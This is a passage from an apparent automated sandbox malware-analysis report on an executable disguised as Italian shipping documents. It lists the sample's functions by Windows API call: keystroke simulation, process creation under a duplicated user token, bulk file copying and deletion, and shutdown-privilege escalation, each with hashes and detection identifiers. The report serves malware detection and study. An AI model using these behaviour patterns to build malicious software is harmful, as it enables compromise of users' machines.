                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                        • SendMessageW.USER32 ref: 0047CD12
                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                        • SendMessageW.USER32 ref: 0047CD80
                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                        • GetCursorPos.USER32(?), ref: 0047CDC8
                        • ScreenToClient.USER32(?,?), ref: 0047CDD6
                        • GetParent.USER32(00000000), ref: 0047CDF7
                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                        • SendMessageW.USER32 ref: 0047CE93
                        • ClientToScreen.USER32(?,?), ref: 0047CEEE
                        • TrackPopupMenuEx.USER32(?,00000000,?,?,02EE1B88,00000000,?,?,?,?), ref: 0047CF1C
                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                        • SendMessageW.USER32 ref: 0047CF6B
                        • ClientToScreen.USER32(?,?), ref: 0047CFB5
                        • TrackPopupMenuEx.USER32(?,00000080,?,?,02EE1B88,00000000,?,?,?,?), ref: 0047CFE6
                        • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                        • String ID: @GUI_DRAGID$F
                        • API String ID: 3100379633-4164748364
                        • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                        • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                        • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                        • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                        Function 00434418 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133keyboardthreadwindowCOMMON
                        Download Yara Rule
                        APIs
                        • GetForegroundWindow.USER32 ref: 00434420
                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                        • IsIconic.USER32(?), ref: 0043444F
                        • ShowWindow.USER32(?,00000009), ref: 0043445C
                        • SetForegroundWindow.USER32(?), ref: 0043446A
                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                        • GetCurrentThreadId.KERNEL32 ref: 00434485
                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                        • SetForegroundWindow.USER32(00000000), ref: 004344B7
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                        • keybd_event.USER32(00000012,00000000), ref: 004344CF
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                        • keybd_event.USER32(00000012,00000000), ref: 004344E6
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                        • keybd_event.USER32(00000012,00000000), ref: 004344FD
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                        • keybd_event.USER32(00000012,00000000), ref: 00434514
                        • SetForegroundWindow.USER32(00000000), ref: 0043451E
                        • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                        • String ID: Shell_TrayWnd
                        • API String ID: 2889586943-2988720461
                        • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                        • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                        • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                        • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                        Function 00446313 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 234processCOMMON
                        Download Yara Rule
                        APIs
                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                        • CloseHandle.KERNEL32(?), ref: 004463A0
                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                        • GetProcessWindowStation.USER32 ref: 004463D1
                        • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                        • _wcslen.LIBCMT ref: 00446498
                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                        • _wcsncpy.LIBCMT ref: 004464C0
                        • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                        • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                        • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,?,?,?,000F01FF,00000400), ref: 00446522
                        • UnloadUserProfile.USERENV(?,?), ref: 00446555
                        • CloseWindowStation.USER32(00000000), ref: 0044656C
                        • CloseDesktop.USER32(?), ref: 0044657A
                        • SetProcessWindowStation.USER32(?), ref: 00446588
                        • CloseHandle.KERNEL32(?), ref: 00446592
                        • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                        • String ID: $@OH$default$winsta0
                        • API String ID: 3324942560-3791954436
                        • Opcode ID: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                        • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                        • Opcode Fuzzy Hash: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                        • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                        Function 0044BD27 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 178filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe,0040F545,C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe,004A90E8,C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe,?,0040F545), ref: 0041013C
                          • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                          • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                          • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                        • _wcscat.LIBCMT ref: 0044BD94
                        • _wcscat.LIBCMT ref: 0044BDBD
                        • __wsplitpath.LIBCMT ref: 0044BDEA
                        • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                        • _wcscpy.LIBCMT ref: 0044BE71
                        • _wcscat.LIBCMT ref: 0044BE83
                        • _wcscat.LIBCMT ref: 0044BE95
                        • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                        • DeleteFileW.KERNEL32(?), ref: 0044BED3
                        • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                        • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                        • DeleteFileW.KERNEL32(?), ref: 0044BF15
                        • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                        • FindClose.KERNEL32(00000000), ref: 0044BF33
                        • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                        • FindClose.KERNEL32(00000000), ref: 0044BF7C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                        • String ID: \*.*
                        • API String ID: 2188072990-1173974218
                        • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                        • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                        • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                        • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                        Function 004788BD Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 217timefileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                        • FindClose.KERNEL32(00000000), ref: 00478924
                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                        • __swprintf.LIBCMT ref: 004789D3
                        • __swprintf.LIBCMT ref: 00478A1D
                        • __swprintf.LIBCMT ref: 00478A4B
                        • __swprintf.LIBCMT ref: 00478A79
                          • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                          • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                        • __swprintf.LIBCMT ref: 00478AA7
                        • __swprintf.LIBCMT ref: 00478AD5
                        • __swprintf.LIBCMT ref: 00478B03
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                        • API String ID: 999945258-2428617273
                        • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                        • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                        • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                        • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                        Function 004033C0 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 359COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                        • __wsplitpath.LIBCMT ref: 00403492
                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                        • _wcscpy.LIBCMT ref: 004034A7
                        • _wcscat.LIBCMT ref: 004034BC
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                          • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                          • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                        • _wcscpy.LIBCMT ref: 004035A0
                        • _wcslen.LIBCMT ref: 00403623
                        • _wcslen.LIBCMT ref: 0040367D
                        Strings
                        • Error opening the file, xrefs: 00428231
                        • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                        • Unterminated string, xrefs: 00428348
                        • _, xrefs: 0040371C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                        • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                        • API String ID: 3393021363-188983378
                        • Opcode ID: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                        • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                        • Opcode Fuzzy Hash: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                        • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                        Function 00431A86 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                        • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                        • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                        • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                        • FindClose.KERNEL32(00000000), ref: 00431B20
                        • FindClose.KERNEL32(00000000), ref: 00431B34
                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                        • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                        • FindClose.KERNEL32(00000000), ref: 00431BCD
                        • FindClose.KERNEL32(00000000), ref: 00431BDB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                        • String ID: *.*
                        • API String ID: 1409584000-438819550
                        • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                        • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                        • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                        • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                        Function 00431BE8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 116COMMON
                        Download Yara Rule
                        APIs
                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                        • __swprintf.LIBCMT ref: 00431C2E
                        • _wcslen.LIBCMT ref: 00431C3A
                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                        • String ID: :$\$\??\%s
                        • API String ID: 2192556992-3457252023
                        • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                        • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                        • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                        • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                        Function 004720DB Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 377timeCOMMON
                        Download Yara Rule
                        APIs
                        • GetLocalTime.KERNEL32(?), ref: 004722A2
                        • __swprintf.LIBCMT ref: 004722B9
                        • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                        • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                        • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                        • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                        • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                        • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                        • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                        • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                        • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: FolderPath$LocalTime__swprintf
                        • String ID: %.3d
                        • API String ID: 3337348382-986655627
                        • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                        • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                        • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                        • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                        Function 00442886 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 135fileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                        • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                        • FindClose.KERNEL32(00000000), ref: 0044291C
                        • FindClose.KERNEL32(00000000), ref: 00442930
                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                        • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                        • FindClose.KERNEL32(00000000), ref: 004429D4
                          • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                        • FindClose.KERNEL32(00000000), ref: 004429E2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                        • String ID: *.*
                        • API String ID: 2640511053-438819550
                        • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                        • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                        • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                        • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                        Function 004333BE Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86shutdownCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                        • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                        • GetLastError.KERNEL32 ref: 00433414
                        • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                        • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                        • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                        Strings
                        Memory Dump Source
